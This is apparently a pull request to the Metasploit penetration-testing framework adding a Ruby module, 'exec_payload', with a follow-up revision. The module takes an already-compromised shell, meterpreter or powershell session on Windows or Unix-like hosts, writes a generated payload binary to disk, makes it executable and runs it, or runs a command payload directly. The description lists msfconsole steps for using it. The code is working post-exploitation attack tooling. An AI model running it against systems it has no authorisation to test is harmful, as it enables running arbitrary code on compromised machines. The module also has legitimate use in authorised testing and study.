### PR TITLE
Added exec_payload

### DIFF
--- a/modules/exploits/multi/local/exec_payload.rb
+++ b/modules/exploits/multi/local/exec_payload.rb
@@ -1,0 +1,55 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Execute a payload on a session',
+        'Description' => %q{
+          This module attempts to Execute a payload on a given session if possible.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Nick Cottrell'
+        ],
+        'Platform' => [ 'linux', 'unix', 'bsd', 'solaris', 'windows' ],
+        'Arch' => ARCH_ALL,
+        'SessionTypes' => [ 'shell', 'meterpreter', 'powershell' ],
+        'DisclosureDate' => '2016-04-30',
+        'Privileged' => false,
+        'Targets' => [['Automatic', {}]],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+  end
+
+  def exploit
+    if payload.arch.first == 'cmd'
+      vprint_line(payload.encoded)
+      print_line(cmd_exec(payload.encoded))
+    elsif session.platform == 'windows'
+      write_file('payload.exe', generate_payload_exe)
+      register_file_for_cleanup('payload.exe')
+      print_line(cmd_exec('payload.exe'))
+    else
+      write_file('payload', generate_payload_exe)
+      chmod('payload', 0o755)
+      register_file_for_cleanup('payload')
+      print_line(cmd_exec('./payload'))
+    end
+  end
+end

--- a/modules/exploits/multi/local/exec_payload.rb
+++ b/modules/exploits/multi/local/exec_payload.rb
@@ -42,12 +42,11 @@ class MetasploitModule < Msf::Exploit::Local
       vprint_line(payload.encoded)
       print_line(cmd_exec(payload.encoded))
     elsif session.platform == 'windows'
-      write_file('payload.exe', generate_payload_exe)
+      upload_and_chmodx('payload.exe', generate_payload_exe)
       register_file_for_cleanup('payload.exe')
       print_line(cmd_exec('payload.exe'))
     else
-      write_file('payload', generate_payload_exe)
-      chmod('payload', 0o755)
+      upload_and_chmodx('payload', generate_payload_exe)
       register_file_for_cleanup('payload')
       print_line(cmd_exec('./payload'))
     end


### PR DESCRIPTION
This is a module that I have waited for for years. This module takes a session that is already active that you can run **whatever you want** and runs whatever payload you want. Regardless of if the payload is cmd or other. If its other, itll create a binary and run it immediatly. Somehow no one thought this would be useful to have for testing payloads and I cant find any documentation anywhere on this same thing already existing.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/local/exec_payload`
- [ ] `set session <session-id>`
- [ ] `set payload <payload. It really doesnt matter>`
- [ ] `run` itll even clean up for you
